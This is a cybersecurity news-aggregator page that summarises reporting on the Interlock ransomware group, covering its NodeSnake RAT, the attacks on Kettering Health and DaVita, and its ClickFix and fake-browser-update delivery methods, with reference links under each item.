CyberSecurity news

FlagThis - #interlock

Mandvi@Cyber Security News //

Interlock Ransomware Deploys New NodeSnake RAT - The Interlock ransomware group is deploying a new remote access trojan (RAT) called NodeSnake to maintain persistent access to compromised corporate networks, targeting educational institutions and local government entities in the UK.
The Interlock ransomware group is actively deploying a new, sophisticated remote access trojan (RAT) known as NodeSnake in attacks targeting corporate networks. Security researchers have observed this campaign, revealing that Interlock is leveraging NodeSnake as a key component of its attack toolkit to maintain persistent access and enhance its post-exploitation capabilities. NodeSnake, written in Golang, allows the attackers to bypass common detection mechanisms and exfiltrate sensitive data, ensuring continued access even if ransomware binaries are detected and removed.

Two UK-based universities and local government entities have recently fallen victim to NodeSnake within the past few months. Analysis by cybersecurity firm Quorum Cyber has uncovered two new variants of the RAT, strongly attributing them to the Interlock ransomware group. The timing and shared code elements between the incidents suggest a coordinated campaign by the same threat actor, signalling a shift in targets for the Interlock ransomware group which is believed to be behind these attacks.

NodeSnake is a type of Remote Access Trojan (RAT). RATs are dangerous because they allow attackers to take control of infected computers from afar. This means attackers can access files, watch what users are doing, change computer settings, and even steal or delete important information remotely while the RATs stay hidden in the system and even introduce other harmful programs. Furthermore, the two NodeSnake variants are from the same family, with the newer one showing significant improvements. This RAT expands the group’s capabilities for reconnaissance, lateral movement, and data exfiltration, facilitating ransomware deployment.

Recommended read:
References :
  • Cyber Security News: Interlock Ransomware Deploys NodeSnake RAT to Maintain Access in Corporate Networks Security researchers have observed a sophisticated cyber campaign in which the Interlock ransomware group is leveraging the NodeSnake remote access trojan (RAT) as part of its attack toolkit against corporate networks.
  • gbhackers.com: Interlock Ransomware Uses NodeSnake RAT for Persistent Access to Corporate Networks In a two UK-based universities have fallen victim to a sophisticated Remote Access Trojan (RAT) dubbed NodeSnake within the past two months.
  • hackread.com: Interlock Ransomware Deploys New NodeSnake RAT in UK Attacks Quorum Cyber identifies two new NodeSnake RAT variants, strongly attributed to Interlock ransomware, impacting UK higher education and local government.
  • BleepingComputer: Interlock ransomware gang deploys new NodeSnake RAT on universities
  • ciso2ciso.com: Interlock Ransomware Deploys New NodeSnake RAT in UK Attacks – Source:hackread.com Source: hackread.com – Author: Deeba Ahmed.
  • cyberpress.org: Interlock Ransomware Deploys NodeSnake RAT to Maintain Access in Corporate Networks Security researchers have observed a sophisticated cyber campaign in which the Interlock ransomware group is leveraging the NodeSnake remote access trojan (RAT) as part of its attack toolkit against corporate networks.
  • ciso2ciso.com: Interlock Ransomware Deploys New NodeSnake RAT in UK Attacks – Source:hackread.com
  • bsky.app: We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks. Learn more about what you need to know about Interlock in my article on the Tripwire blog. #cybersecurity #ransomware #clickfix
  • Graham Cluley: "We don’t just want payment; we want accountability." The malicious hackers behind the Interlock ransomware try to justify their attacks.
@ketteringhealth.org //

Kettering Health Crippled by Ransomware Attack - Kettering Health experienced a ransomware attack causing a system-wide technology outage, impacting operations and leading to the cancellation of elective medical procedures.
Kettering Health, a healthcare network operating 14 medical centers and over 120 outpatient facilities in western Ohio, has been hit by a ransomware attack causing a system-wide technology outage. The cyberattack, which occurred on Tuesday, May 20, 2025, has forced the cancellation of elective inpatient and outpatient procedures and has disrupted access to critical patient care systems, including phone lines, the call center, and the MyChart patient portal. Emergency services remain operational, but emergency crews are being diverted to other facilities due to the disruption. Kettering Health has confirmed they are responding to the cybersecurity incident involving unauthorized access to its network and has taken steps to contain and mitigate the breach, while actively investigating the situation.

The ransomware attack is suspected to involve the Interlock ransomware gang, which emerged last fall and has targeted various sectors, including tech, manufacturing firms, and government organizations. A ransom note, viewed by CNN, claimed the attackers had secured Kettering Health's most vital files and threatened to leak stolen data unless the health network began negotiating an extortion fee. In response to the disruption, Kettering Health has canceled elective procedures and is rescheduling them for a later date. Additionally, the organization is cautioning patients about scam calls from individuals posing as Kettering Health team members requesting credit card payments and has halted normal billing calls as a precaution.

The incident highlights the increasing cybersecurity challenges facing healthcare systems. According to cybersecurity experts, healthcare networks often operate with outdated technology and lack comprehensive cybersecurity training for staff, making them vulnerable to attacks. There is a call to action to invest in healthcare cybersecurity, with recommendations for the government and its partners to address understaffed healthcare cyber programs by tweaking federal healthcare funding programs to cover critical cybersecurity expenditures, augmenting healthcare cybersecurity workforces and incentivizing cyber maturity.

Recommended read:
References :
  • industrialcyber.co: Ransomware suspected in Kettering Health cyberattack disrupting patient services, canceling elective procedures
  • BleepingComputer: Kettering Health, a healthcare network that operates 14 medical centers in Ohio, was forced to cancel inpatient and outpatient procedures following a cyberattack that caused a system-wide technology outage.
  • www.bleepingcomputer.com: Kettering Health, a healthcare network that operates 14 medical centers in Ohio, was forced to cancel inpatient and outpatient procedures following a cyberattack that caused a system-wide technology outage. [...]
  • DataBreaches.Net: Elective inpatient and outpatient procedures were canceled.
  • thecyberexpress.com: Kettering Health Hit by Cyberattack: Network Outage and Scam Calls Reported
  • The DefendOps Diaries: Strengthening Cybersecurity in Healthcare: Lessons from the Kettering Health Ransomware Attack
  • BleepingComputer: Kettering Health hit by system-wide outage after ransomware attack
  • The Dysruption Hub: Reports Ransomware Attack Cripples Kettering Health Systems Across Ohio
  • www.healthcareitnews.com: Kettering Health faces a ransomware attack and confirms a scam targeting its patients
  • www.scworld.com: Apparent ransomware attack leads to systemwide outage for Kettering Health
  • Industrial Cyber: Reports Ransomware suspected in Kettering Health cyberattack disrupting patient services, canceling elective procedures
  • www.itpro.com: The incident at Kettering Health disrupted procedures for patients
  • www.cybersecuritydive.com: Ohio’s Kettering Health hit by cyberattack
Pierluigi Paganini@Security Affairs //

Interlock Ransomware Leaks Data from DaVita Dialysis Firm - The Interlock ransomware gang has claimed responsibility for a cyberattack on DaVita, a major kidney dialysis firm, and has begun leaking stolen data.
The Interlock ransomware group has claimed responsibility for a cyberattack on DaVita, a major kidney dialysis firm with over 2,600 U.S. dialysis centers and 76,000 employees across 12 countries. DaVita disclosed to the U.S. Securities and Exchange Commission (SEC) that they suffered a ransomware attack on April 12th affecting some operations. The company is currently investigating the impact of the incident which is the latest in a surge of ransomware attacks hitting US healthcare organizations.

Earlier today, the Interlock ransomware gang claimed responsibility for the attack by adding DaVita to its list of victims. The group has started leaking data allegedly stolen from the organization, claiming to have exfiltrated over 1.5 TB of data. The healthcare sector is increasingly under siege from cybercriminals, with ransomware attacks posing a significant threat to operational integrity and patient safety. This incident underscores the urgency for healthcare organizations to bolster their cybersecurity defenses to effectively counter these evolving threats.

Ransomware attacks in the healthcare sector can have severe implications for patient care and safety. The DaVita attack disrupted internal operations and encrypted certain on-premises systems, affecting the delivery of essential medical services. Though patient care at DaVita centers and patients' homes continued, the incident highlights the potential for treatment delays and compromised patient safety. Following the attack, DaVita disclosed the incident to the U.S. Securities and Exchange Commission (SEC), indicating the regulatory scrutiny that healthcare organizations face in the aftermath of cyberattacks.

Recommended read:
References :
  • securityaffairs.com: The Interlock ransomware gang claimed responsibility for the attack on the leading kidney dialysis company DaVita and leaked alleged stolen data.
  • BleepingComputer: BleepingComputer on Interlock ransomware claims DaVita attack and leaks stolen data
  • hackread.com: Ransomware Surge Hits US Healthcare: AOA, DaVita and Bell Ambulance Breached
  • www.cysecurity.news: Cyberattacks Hit U.S. Healthcare Firms, Exposing Data of Over 236,000 People
  • CyberInsider: Claims by Interlock of data theft from DaVita.
  • bsky.app: The Interlock ransomware gang has claimed the cyberattack on DaVita kidney dialysis firm and leaked data allegedly stolen from the organization.
  • www.redpacketsecurity.com: [INTERLOCK] – Ransomware Victim: DaVita
  • cyberinsider.com: Cyber Insider: Interlock Ransomware Group Claims DaVita Attack, Leaks Over 1.5 TB of Data.
  • hackread.com: Interlock Ransomware Say It Stole 20TB of DaVita Healthcare Data
  • www.scworld.com: Interlock takes credit for DaVita hack
@The DefendOps Diaries //

Interlock Ransomware Gang Uses ClickFix in Attacks - The Interlock ransomware gang uses ClickFix attacks to impersonate IT tools, breach networks, and deploy file-encrypting malware, evading traditional detection.
The Interlock ransomware gang is actively employing ClickFix attacks to infiltrate corporate networks and deploy file-encrypting malware. This social engineering tactic tricks users into executing malicious PowerShell commands, often under the guise of fixing an error or verifying their identity. By impersonating legitimate IT tools, Interlock bypasses traditional security measures that rely on automated detection, as the malicious code is executed manually by the victim. This represents a significant shift in the cyber threat landscape, highlighting the importance of understanding and defending against these evolving tactics.

ClickFix attacks involve manipulating users through deceptive prompts, such as fake error messages, CAPTCHA verifications, or system update requests. Victims are tricked into copying and pasting harmful commands into their systems, leading to the silent installation of malware. Interlock has been observed using fake browser and VPN client updates to deliver malware, and even uses compromised websites to redirect users to fake popup windows. These windows ask the user to paste scripts into a PowerShell terminal, initiating the malware infection process.

While the infrastructure supporting Interlock's ClickFix campaigns appears dormant since February 2025, the group's use of this technique signals ongoing innovation in their delivery mechanisms. This, combined with their consistent use of credential-stealing malware like LummaStealer and BerserkStealer, and a proprietary Remote Access Trojan (RAT), demonstrates Interlock's sophisticated approach to breaching networks. Organizations must enhance their security awareness training and implement measures to detect and prevent users from falling victim to ClickFix and other social engineering tactics.

Recommended read:
References :
  • securityonline.info: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • The DefendOps Diaries: The Rise of ClickFix Attacks: Understanding the Interlock Ransomware Gang
  • BleepingComputer: Interlock ransomware gang pushes fake IT tools in ClickFix attacks
  • www.scworld.com: ClickFix increasingly utilized in state-backed malware attacks
  • cyberpress.org: Interlock Ransomware Delivers Malicious Browser Updates via Multi-Stage Attack on Legitimate Websites
  • gbhackers.com: Interlock Ransomware Uses Multi-Stage Attack Through Legitimate Websites to Deliver Malicious Browser Updates
  • Cyber Security News: Reports show the latest ClickFix attack.
  • www.scworld.com: Interlock ransomware evolves tactics with ClickFix, infostealers
  • Talkback Resources: Interlock Ransomware Uses Evolving Tactics to Evade Detection
  • securityonline.info: Security Online discusses interlock ransomware using Evolving Tactics to Evade Detection.
  • gbhackers.com: State Sponsored Hackers now Widely Using ClickFix Attack Technique in Espionage Campaigns
  • The Hacker News: State-Sponsored Hackers Weaponize ClickFix Tactic in Targeted Malware Campaigns
  • bsky.app: Interlock ransomware gang pushes fake IT tools in ClickFix attacks ift.tt/TqmAQIF
  • securityonline.info: State-Sponsored Actors Adopt ClickFix Technique in Cyber Espionage
  • hackread.com: North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks
  • BleepingComputer: Interlock ransomware claims DaVita attack, leaks stolen data
@gbhackers.com //

Interlock Ransomware's Evolving Tactics - Interlock ransomware group uses a multi-stage attack through legitimate websites to deliver malicious browser updates, targeting organizations in North America and Europe, operating independently and focusing on targeted attacks and double-extortion campaigns.
The Interlock ransomware group has escalated its operations across North America and Europe, employing sophisticated techniques to evade detection. Cybersecurity firms such as Sekoia Threat Detection & Research (TDR) are closely monitoring Interlock's activities, revealing their evolving tactics and tools. Unlike typical Ransomware-as-a-Service (RaaS) operations, Interlock operates independently, focusing on targeted attacks known as Big Game Hunting and double extortion campaigns. Their tactics include compromising legitimate websites to host deceptive browser update pages, tricking users into downloading malicious PyInstaller files that appear as legitimate Google Chrome or Microsoft Edge installers.

These fake installers launch PowerShell-based backdoors, which continuously execute HTTP requests to communicate with command-and-control (C2) servers. This PowerShell script collects system information and offers functionality for executing arbitrary commands and establishing persistence. Interlock uses a continuous communication loop with the C2 server to maintain persistence. The C2 server can then issue commands to terminate the backdoor or deploy additional malware, such as keyloggers or credential stealers like LummaStealer and BerserkStealer. These actions bypass automated defenses by tricking victims into manually executing malicious commands.

In early 2025, Interlock began experimenting with ClickFix, a social engineering technique that prompts users to execute malicious PowerShell commands through spoofed CAPTCHAs or browser alerts, supposedly to "fix" an issue. Interlock also uses IP address clustering to maintain infrastructure resilience, often utilizing IPs from BitLaunch, Hetzner Online GmbH, and other autonomous systems. The group commonly uses RDP and stolen credentials for lateral movement within compromised networks, often targeting domain controllers to gain widespread control. Cybersecurity researchers actively adapt defenses against Interlock's techniques.

Recommended read:
References :
  • gbhackers.com: Interlock leverages a multi-stage attack through seemingly benign websites and malicious browser updates, demonstrating its advanced tactics for evasion.
  • securityonline.info: The group is distinguished by its independent operations, focusing on targeted attacks and double-extortion campaigns, and avoiding a RaaS model.
  • BleepingComputer: Interlock ransomware gang pushes fake IT tools in ClickFix attacks

Posts

Blogs

Research Tools